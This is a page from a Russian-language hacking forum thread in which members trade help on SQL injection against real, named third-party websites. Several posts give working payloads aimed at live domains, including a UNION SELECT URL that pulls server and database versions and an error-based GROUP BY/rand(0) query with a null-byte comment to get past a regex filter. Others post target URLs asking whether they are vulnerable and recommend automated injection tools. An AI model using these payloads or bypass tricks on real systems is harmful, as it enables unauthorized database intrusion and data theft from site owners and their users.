Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. brutos

    brutos Member

    Joined:
    25 Nov 2009
    Messages:
    123
    Likes Received:
    27
    Reputations:
    8
    Не знаю) Я просто прогнал ссылку через прогу "Havij", она спокойно все обработала. Перехватил запрос, ну и поигрался с ним. Ничего особенного)

    Вообще, там даже вот так все работает:
    Фильтры стоят на select и from.
     
    #14801 brutos, 13 Sep 2010
    Last edited: 13 Sep 2010
  2. moodoone

    moodoone Member

    Joined:
    21 Oct 2009
    Messages:
    144
    Likes Received:
    38
    Reputations:
    5
    Code:
    http://www.koruna.ua/index.php?id=2'
    А тут можеш мне помочь? Сайт уязвим вобше?
    ____
    Сам вроде разобрался) Спасибо еще раз)
     
    #14802 moodoone, 13 Sep 2010
    Last edited: 13 Sep 2010
  3. gabarea

    gabarea New Member

    Joined:
    30 Mar 2010
    Messages:
    30
    Likes Received:
    2
    Reputations:
    1
    http://powell.citymedia.ca/deal_framed.php?deal_id=64202
     
    1 person likes this.
  4. brutos

    brutos Member

    Joined:
    25 Nov 2009
    Messages:
    123
    Likes Received:
    27
    Reputations:
    8
    http://powell.citymedia.ca/categorydetails.php?cat_id=-186'+union+select+1,@@version_compile_os,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,version(),20,21,22,23,24,25,26,27,28,29,30+--+
     
  5. Kappa_87

    Kappa_87 New Member

    Joined:
    21 Aug 2010
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    что делать если union и select в связке фильтруются
     
    #14805 Kappa_87, 14 Sep 2010
    Last edited: 14 Sep 2010
  6. gabarea

    gabarea New Member

    Joined:
    30 Mar 2010
    Messages:
    30
    Likes Received:
    2
    Reputations:
    1
    http://www.ftv.com/fashion/page.php?P=2803&gid=807&kid=11473&size=full&pid=53965
     
  7. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    а не пойти бы вам на все 3 буквы? тут что для вас....конвеер по раскрутке скулей для тебя?
     
  8. DrakonHaSh

    DrakonHaSh Elder - Старейшина

    Joined:
    16 Apr 2008
    Messages:
    118
    Likes Received:
    29
    Reputations:
    24
    Kappa_87

    http://www.xxx.ru/showtopic.php?num=-123 or 1 /*%00*/ group by concat(left((select count(*) from INFORMATION_SCHEMA.TABLES),64),rand(0)|0) having min(0)--+
    =>
    244

    в принципе с /*%00*/ и обыкновенный union select скорее всего прокатит (лень и неинтересно уже дальше копать) - у них там некая хрень, похоже самописная, которая все параметры к сайту при любом обращении фильтрует по regexp на что-то в роде select.+from и union.+select c безразличеем к регистру.

    кста, запрос и через post проходит ;)
     
    #14808 DrakonHaSh, 14 Sep 2010
    Last edited: 14 Sep 2010
    1 person likes this.
  9. B1t.exe

    B1t.exe Elder - Старейшина

    Joined:
    6 Nov 2006
    Messages:
    1,020
    Likes Received:
    128
    Reputations:
    23
    Заметил, что есть категория сайтов, у которых нет "подцепки" для неопытных..
    ну скажем сайт крутой, серьезный и куда не переходи - все линки кончаются на *.htm , *.aspx или .html. А в особыйслучаях - без расширением, чисто по разделам: /home/, /photo/ и т.п.
    В таких случаях как можно быть ? в концах попробывал сатвить ', 1=1 и т.п. дела, а по просто показывает, что нет такого страницы.
    просто я обычно тренировался на т.п. запросах, как это: /*.php?id=***
    а тут другая ситуация уже..
     
  10. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    mod_rewrite тебе о чем нибудь говорит?
     
    1 person likes this.
  11. B1t.exe

    B1t.exe Elder - Старейшина

    Joined:
    6 Nov 2006
    Messages:
    1,020
    Likes Received:
    128
    Reputations:
    23
    Gorev

    ну да, недавно было тема об этом mod_rewrite , сказали, что тлько фаззингом можно раскрывать пути вроде.
    а как насчет этих:
    это уж точно не mod_rewrite !
     
  12. shell_c0de

    shell_c0de Hack All World

    Joined:
    7 Jul 2009
    Messages:
    1,185
    Likes Received:
    618
    Reputations:
    690
    ты аккаунт купил или реально с 2006 года в очаде ? =\
    голый html сайт собрался инъектировать ? 0_о
    а вот тебе насчет aspx пример
     
    _________________________
  13. h00lyshit!

    h00lyshit! [From Nobody To Root]

    Joined:
    10 Sep 2009
    Messages:
    289
    Likes Received:
    290
    Reputations:
    195
    Почему ты так уверен, что это точно не Mod_Rewrite?
    URL можно преобразовать, как угодно и расширение, там может быть любое.
    Вот пример:
    HTML:
    http://www.realcoding.net/news/v-sql-server-katmai-ne-budet-ozhidaemykh-funktsii-winfs.html
    Ты думаешь сайт написан на статическом html, а статьи обновляются вручную без базы данных?

    Это ничто иное, как php + mysql.

    Самый простой и не "хакерский" способ, смотрим заголовки сниффера:

    Code:
    Server[Apache/2.0.63 (CentOS)]
    X-Powered-By[PHP/5.2.9]
    Ну и исходный код статьи:
    Code:
    http://www.realcoding.net/[COLOR=White][B]redir.php[/B][/COLOR]?url=http://www.thevista.ru
    
     
    #14813 h00lyshit!, 15 Sep 2010
    Last edited: 25 Sep 2010
    2 people like this.
  14. B1t.exe

    B1t.exe Elder - Старейшина

    Joined:
    6 Nov 2006
    Messages:
    1,020
    Likes Received:
    128
    Reputations:
    23
    Redwood
    хмм.. вот как значит.. все же Mod_Rewrite так активно исползуется в многих сайтах ?
    а там как можно искать SQL иньекции ? только только фаззинг и сканирование портов ? :(((
     
  15. B1t.exe

    B1t.exe Elder - Старейшина

    Joined:
    6 Nov 2006
    Messages:
    1,020
    Likes Received:
    128
    Reputations:
    23
    shell_c0de

    не надо гонять тут на меня. стариков хоть уважать надо.
    не зная SQL - не значит, что акк купил.
    я тут с времени империализма.

    а то, то я написал по поводу html, то точно знаю, что там есть SQL база и наверно PHP тоже.
    вот смотри пост redwood и поймешь, что на самом деле сайт то не голый...
     
  16. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274

    www.site.com/news=123(SQL injection).html
    примерно так

    П.С. Уважение зарабатывается не возрастом ..а делами которые ты сделал
     
  17. shell_c0de

    shell_c0de Hack All World

    Joined:
    7 Jul 2009
    Messages:
    1,185
    Likes Received:
    618
    Reputations:
    690
    2B1t.exe ну хз как бэ сорри если что =\
    кстати юзай еще прогу от Seravin'a BSQLi_v.1.2 он тоже прочекает все твои ссылки на скули
     
    _________________________
  18. jecka3000

    jecka3000 Elder - Старейшина

    Joined:
    15 Mar 2008
    Messages:
    360
    Likes Received:
    54
    Reputations:
    4
    при переходе в какую-нибудь диру пишет:
    You don't have permission to access /admin on this server.

    чем спастись от этого?
     
  19. B1t.exe

    B1t.exe Elder - Старейшина

    Joined:
    6 Nov 2006
    Messages:
    1,020
    Likes Received:
    128
    Reputations:
    23
    Gorev
    типа www.site.com/news=123&photo=2+UNION+ALL+SELECT+1,2,3,4,5.....html
    типа того?
    Ну и не надо обсирать.

    shell_c0de
    читал в топике. тип пишет, что helper лучше вроде. ну написал в теме. ТС если обновит и с виде выложит - сакчаю и буду юзать.
     
  20. NorB

    NorB Elder - Старейшина

    Joined:
    20 Jul 2007
    Messages:
    109
    Likes Received:
    12
    Reputations:
    -2
    Народ если я делаю подбор кол-ва колонок по group by а потом делаю запрос с юнионом мне форбиден к скрипту вылетает - это фильтрация юнион и селекта?
     
Thread Status:
Not open for further replies.